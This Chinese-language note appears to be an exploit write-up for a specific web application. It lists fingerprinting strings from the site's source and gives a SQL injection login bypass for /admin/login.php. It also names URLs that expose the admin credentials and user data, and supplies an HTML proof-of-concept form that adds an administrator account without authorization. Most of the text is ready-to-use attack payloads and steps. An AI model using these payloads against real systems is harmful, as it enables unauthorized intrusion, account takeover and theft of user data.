特征:
首页部分源码特征:
/*弹出逻辑:手动输入网址:refer空或等于http://m.qzone.com*/
//活动页干掉
//微信,qq干掉
//MSIE也不展示
后台特征:
越权
url//admin/login.php
账号admin' or 'a'='a
密码随意 即可成功登陆
查看源代码可以看到管理员账号密码
view-source:http://xxx/admin/selectadmin.php
查看后台数据
view-source:http://xxx/admin/select_user.php
越权添加管理员
poc
<script>document.getElementById("admin_icon").innerHTML="";</script><section class="rt_wrap content mCustomScrollbar">
<div class="rt_content">
<section>
<h2><strong style="color:grey;">管理员账号添加</strong></h2>
<form action="http://xxx/admin/check.php?act=add_admin" method="post">
<ul class="ulColumn2">
<li>
<span class="item_name" style="width:120px;">管理员登录账号:</span>
<input type="text" name="user" id="user" class="textbox textbox_295" placeholder="输入用户名..."/>
<!-- <span class="errorTips">错误提示信息...</span> -->
</li>
<li>
<span class="item_name" style="width:120px;">管理员登录密码:</span>
<input type="password" name="pwd" id="pwd" class="textbox textbox_295" placeholder="输入密码..."/>
<!-- <span class="errorTips">错误提示信息...</span> -->
</li>
<li>
<span class="item_name" style="width:120px;"></span>
<input type="submit" value="确认添加" class="link_btn" id="submit"/>
</li>
</ul>
</section>
</div>
</section>
保存为*.htm,然后打开输入账号密码,添加以后可以直接登录后台。